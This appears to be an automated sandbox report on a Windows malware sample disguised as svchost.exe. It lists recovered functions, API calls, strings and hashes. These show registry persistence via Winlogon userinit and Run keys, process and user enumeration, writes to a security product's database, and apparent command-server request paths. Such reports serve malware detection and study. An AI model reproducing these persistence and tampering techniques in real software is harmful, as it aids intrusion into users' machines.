                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                            • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                            • API String ID: 33631002-3172865025
                                                                                                                                                                                                            • Opcode ID: 9681e669b6bc70e9123dd5980162aec26310b354dbad36ed1e8ea522fa3927e4
                                                                                                                                                                                                            • Instruction ID: e7d083a3d342eb0d1741576d2c48f75b21a67eac2e30cb69abab2c03069a185e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9681e669b6bc70e9123dd5980162aec26310b354dbad36ed1e8ea522fa3927e4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 384184B0D01358DEEB20CF959988BDEFEB5BB04308F5081AED5186B281C7B90A89CF55
                                                                                                                                                                                                            Function 02C743E0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 199memoryprocessCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C74413
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,755735B0,00000000), ref: 02C7441E
                                                                                                                                                                                                            • Process32First.KERNEL32 ref: 02C74441
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C7445D
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C74477
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 02C744B0
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C744B7
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C744CB
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?,?,00000000,?), ref: 02C744FC
                                                                                                                                                                                                            • GetModuleFileNameExA.KERNELBASE(00000000,00000000,?,00000104,?,?,?,?,00000000,?), ref: 02C74513
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C7457C
                                                                                                                                                                                                            • Process32Next.KERNEL32(?,?), ref: 02C7458B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleHeapProcessProcess32memset$AllocCloseCreateFileFirstInformationModuleNameNextOpenSnapshotToolhelp32_snprintf
                                                                                                                                                                                                            • String ID: %d%s$[System Process]$taskmgr{PIDProcess name
                                                                                                                                                                                                            • API String ID: 3808533164-4214784430
                                                                                                                                                                                                            • Opcode ID: d5d3fb5d249bcd83fd116b4f2903be2a5c7312a70a5c95f9b7e6c20cb0017866
                                                                                                                                                                                                            • Instruction ID: a58d1df14372a35efa8db0775b27ced9be746b89a85be76ce4bc9d0dd6485024
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5d3fb5d249bcd83fd116b4f2903be2a5c7312a70a5c95f9b7e6c20cb0017866
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5661E171A44381AFD326DB24D848FA7BBF9EFC4704F048A58F89587240E770D608CBA2
                                                                                                                                                                                                            Function 02C96C70 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 187COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetFileType.KERNEL32(?,00000000,00000000), ref: 02C96C79
                                                                                                                                                                                                            • GetFileInformationByHandle.KERNEL32(?,?), ref: 02C96C96
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$HandleInformationType
                                                                                                                                                                                                            • String ID: ,D0<$,D0<$D0<$D0<
                                                                                                                                                                                                            • API String ID: 4064226416-1748840775
                                                                                                                                                                                                            • Opcode ID: 4837e2ca51a3dc12170bb28ce22d2c1c9feb5f4725421d38bfecf30f5d924a9d
                                                                                                                                                                                                            • Instruction ID: 7f8221c318e4143dce0d053032e39b27c28f664beaf338886061e0b2e7157856
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4837e2ca51a3dc12170bb28ce22d2c1c9feb5f4725421d38bfecf30f5d924a9d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED516F72D40218ABDF14CFA9DC89BBEBB7CEB84700F244569E915EB1C0D774AA40CB95
                                                                                                                                                                                                            Function 02C759E0 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 204stringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$strstrstrtol
                                                                                                                                                                                                            • String ID: %s%s$1676d5775e05c50b46baa5579d4fc7$eyuioa$qwrtpsdfghjklzxcvbnm
                                                                                                                                                                                                            • API String ID: 600650289-3097137778
                                                                                                                                                                                                            • Opcode ID: fc2807ee961e9a133faa56c9e298ffd15ae3ba6a2ea2150a52904871b0101bd3
                                                                                                                                                                                                            • Instruction ID: da856dfcd850f2cb1d291f491d62d00feefe61db9d72616daca149179db0e07f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fc2807ee961e9a133faa56c9e298ffd15ae3ba6a2ea2150a52904871b0101bd3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7719E71E482599BDB26CB78AC90BDEBBB5EF48300F0445E8ED49E3281D3705B45CBA1
                                                                                                                                                                                                            Function 02C82410 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 149memoryfileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C82431
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8244C
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?,?,?,?,75570F00,00000000,00000000), ref: 02C82466
                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(?,00000000,00000000,?,?,?,?,75570F00,00000000,00000000), ref: 02C8247C
                                                                                                                                                                                                              • Part of subcall function 02C76240: memset.MSVCRT ref: 02C76271
                                                                                                                                                                                                              • Part of subcall function 02C76240: memset.MSVCRT ref: 02C7628F
                                                                                                                                                                                                              • Part of subcall function 02C76240: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C762AB
                                                                                                                                                                                                              • Part of subcall function 02C76240: RegQueryValueExA.KERNEL32(?,92F358B2a,00000000,00000001,?,00000104), ref: 02C762D2
                                                                                                                                                                                                              • Part of subcall function 02C76240: GetProcessHeap.KERNEL32(00000008,00000110,?,?), ref: 02C7634A
                                                                                                                                                                                                              • Part of subcall function 02C76240: HeapAlloc.KERNEL32(00000000), ref: 02C76351
                                                                                                                                                                                                              • Part of subcall function 02C76240: memset.MSVCRT ref: 02C76365
                                                                                                                                                                                                              • Part of subcall function 02C76240: lstrcpynA.KERNEL32(00000000,00000000,00000104), ref: 02C7637E
                                                                                                                                                                                                              • Part of subcall function 02C76240: RegCloseKey.ADVAPI32(?), ref: 02C7638C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,75570F00,00000000,00000000), ref: 02C824CB
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,75570F00,00000000,00000000), ref: 02C824D2
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,75570F00,00000000,00000000), ref: 02C824DE
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,75570F00,00000000,00000000), ref: 02C824E5
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000,00000001,00000001,00000000,/topic.php,?,00000001,00000001,00000001,00000000,00000001,?,?,?,75570F00), ref: 02C82539
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,?,?,?,75570F00,00000000,00000000), ref: 02C82546
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,75570F00,00000000,00000000), ref: 02C82584
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,75570F00,00000000,00000000), ref: 02C82587
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,75570F00,00000000,00000000), ref: 02C82593
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,75570F00,00000000,00000000), ref: 02C82596
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Processmemset$File$FreeTempValidate$AllocAttributesCloseDeleteNameOpenPathQueryValuelstrcpyn
                                                                                                                                                                                                            • String ID: /topic.php
                                                                                                                                                                                                            • API String ID: 870369024-224703247
                                                                                                                                                                                                            • Opcode ID: a454c440bb8eed63a1394de1c136b9f8726c41ba902644c2b30aa70d9e561112
                                                                                                                                                                                                            • Instruction ID: 859b79327cd0db00b4ba6194f57fb873a6453a7128b419a7423951229dc9266e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a454c440bb8eed63a1394de1c136b9f8726c41ba902644c2b30aa70d9e561112
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B9414C72D801986FCB21EF749C9CEEABBADEF84304F048995F945D3141D6718B44CBA1
                                                                                                                                                                                                            Function 02C88C60 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 111filethreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02C88C7A
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02C88C87
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02C88CA4
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000188F0,?,00000000,00000000), ref: 02C88CED
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C88D05
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C88D16
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 02C88D28
                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02C88D40
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C88D60
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000,00000000,/home.php,?,00000001,?,?,00000001,00000000), ref: 02C88DAA
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02C88DB7
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • name=%s&port=%u, xrefs: 02C88D4F
                                                                                                                                                                                                            • %48%55%42%45%52%54%21%39%36%35%35%34%33%21%30%39%43%30%36%36%38%33, xrefs: 02C88D4A
                                                                                                                                                                                                            • SystemDrive, xrefs: 02C88C75
                                                                                                                                                                                                            • /home.php, xrefs: 02C88D91
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$HandleInformationPathTemp$AttributesBackslashCloseCreateDeleteEnvironmentNameThreadVariableVolume_snprintf
                                                                                                                                                                                                            • String ID: %48%55%42%45%52%54%21%39%36%35%35%34%33%21%30%39%43%30%36%36%38%33$/home.php$SystemDrive$name=%s&port=%u
                                                                                                                                                                                                            • API String ID: 1291007772-1242199463
                                                                                                                                                                                                            • Opcode ID: c8c801393c20ce4181e5ce373c2be4160f4b6f058acb619a3269d56a1740c02f
                                                                                                                                                                                                            • Instruction ID: 19e462e9301785fa3939d799fcd2f6b6f711ed7f5f2997c3c6809450ae5e9672
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8c801393c20ce4181e5ce373c2be4160f4b6f058acb619a3269d56a1740c02f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E419571A80249BFEB15EB60CC49FE9777DEF84704F0086D4B605A7180EBB09B448BA0
                                                                                                                                                                                                            Function 02C74630 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 158memoryfileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,00000000,00000000,00000000,755735B0,00000000,?,?,?,?,02C74FC0,00000000), ref: 02C74677
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,?,02C74FC0,00000000,00000000,00000000), ref: 02C746BD
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,02C74FC0,00000000,00000000,00000000), ref: 02C746C4
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C746D7
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C7471D
                                                                                                                                                                                                            • NetApiBufferFree.NETAPI32(00000000,?,?,?,?,02C74FC0,00000000,00000000), ref: 02C74754
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02C74FC0,02C74FC1,000000EA,00000000), ref: 02C7478C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,02C74FC0), ref: 02C7479F
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C747A2
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,02C74FC0), ref: 02C747AF
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C747B2
                                                                                                                                                                                                            • NetApiBufferFree.NETAPI32(00000000,?,?,?,?,02C74FC0,00000000,00000000,00000000), ref: 02C747C5
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$FreeProcess$Buffer$AllocDisplayFileInformationQueryValidateWrite_snprintfmemset
                                                                                                                                                                                                            • String ID: %S$netuser{
                                                                                                                                                                                                            • API String ID: 639091076-3648794683
                                                                                                                                                                                                            • Opcode ID: c680fe2a91c26ed435c5a11ecd28dce61d6406146c70b4d7320c46dbff52e3f7
                                                                                                                                                                                                            • Instruction ID: a09513ab196caa84cab5f38fd2b69e8b71630842e68712c06780eeb64ca6a33b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c680fe2a91c26ed435c5a11ecd28dce61d6406146c70b4d7320c46dbff52e3f7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B51D871E40259ABDF26CFA4DC58BEFBBB9EF85701F144695E804E7244D7309A04CBA1
                                                                                                                                                                                                            Function 00402420 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040243C
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004024A0
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004024C3
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004024D8
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 004024E4
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004024F3
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 004024FF
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040250E
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040251A
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402529
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402535
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402544
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00402547
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2676559004.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                            • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                            • API String ID: 606440919-2829233815
                                                                                                                                                                                                            • Opcode ID: 8452569d89d16074c856ebe9e50090442212cf04daf89a05b4dc4c5533925dd3
                                                                                                                                                                                                            • Instruction ID: da06213ca23f861e298ab990455e1520987101534f77d1697d18ba9606f76a1b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8452569d89d16074c856ebe9e50090442212cf04daf89a05b4dc4c5533925dd3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03314871684218BEF311EB90DC96FEA7768EF89B00F104165F304AA1D0DBF16A45CBA9
                                                                                                                                                                                                            Function 02C73310 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 80registryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C73335
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02C73354
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02C73361
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02C7337E
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C73399
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02C733B7
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,00000000), ref: 02C733EE
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02C7340C
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 02C7341A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • software\microsoft\windows\currentversion\run, xrefs: 02C733E4
                                                                                                                                                                                                            • SystemDrive, xrefs: 02C7334F
                                                                                                                                                                                                            • C:\Windows\apppatch\svchost.exe, xrefs: 02C733C4, 02C733FB
                                                                                                                                                                                                            • userinit, xrefs: 02C73406
                                                                                                                                                                                                            • software\microsoft\windows nt\currentversion\winlogon, xrefs: 02C733AD
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Open$AdminBackslashCloseEnvironmentInformationPathQueryUserValueVariableVolume_snprintf
                                                                                                                                                                                                            • String ID: C:\Windows\apppatch\svchost.exe$SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                            • API String ID: 3780845138-4271125494
                                                                                                                                                                                                            • Opcode ID: 6b750813ce8372b554415f7555ee6dfe068380e2f3290fbfdfa6d2ac92d90761
                                                                                                                                                                                                            • Instruction ID: 77455b1871250831008721f3d0005f1f0931f4f4ce81c7aab28f52af9f795f73
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6b750813ce8372b554415f7555ee6dfe068380e2f3290fbfdfa6d2ac92d90761
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56213CB1E80248BBFB15CB90DD4AFEDB77CEB44B00F104598B705A7080D7B4AA44CBA1
                                                                                                                                                                                                            Function 00402810 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 106registryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegCreateKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040284B
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402866
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 00402873
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 00402890
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 004028AB
                                                                                                                                                                                                            • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 004028FA
                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 0040291E
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(00000000), ref: 0040292D
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402937
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402833
                                                                                                                                                                                                            • userinit, xrefs: 00402918
                                                                                                                                                                                                            • software\microsoft\windows\currentversion\run, xrefs: 004028F0
                                                                                                                                                                                                            • SystemDrive, xrefs: 00402861
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2676559004.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                            • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                            • API String ID: 3547530944-2324515132
                                                                                                                                                                                                            • Opcode ID: a4bf4f337ed71f520bd7e73d3d42088919ba7b50cd5950a846e16a8a3e84f3f8
                                                                                                                                                                                                            • Instruction ID: 580de61d93956de76c260b8cd85b43503f34d02da1fa31da69fbe3ce3aace33d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4bf4f337ed71f520bd7e73d3d42088919ba7b50cd5950a846e16a8a3e84f3f8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F3166B5740305BBE720DB909D4AFEA777CDB95B00F208155FB44BA1D0D6F4AA448BA8
                                                                                                                                                                                                            Function 02C93B50 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C93B76
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,?,?,00000000,75570F00), ref: 02C93B87
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C93B90
                                                                                                                                                                                                            • SwitchToThread.KERNEL32 ref: 02C93B9F
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02C93BA8
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C93BC8
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C93BD9
                                                                                                                                                                                                            • Module32First.KERNEL32(00000000,?), ref: 02C93BFA
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,kernel), ref: 02C93C1C
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,.dll), ref: 02C93C28
                                                                                                                                                                                                            • Module32Next.KERNEL32(00000000,00000224), ref: 02C93C36
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                            • String ID: .dll$kernel
                                                                                                                                                                                                            • API String ID: 2979424695-2375045364
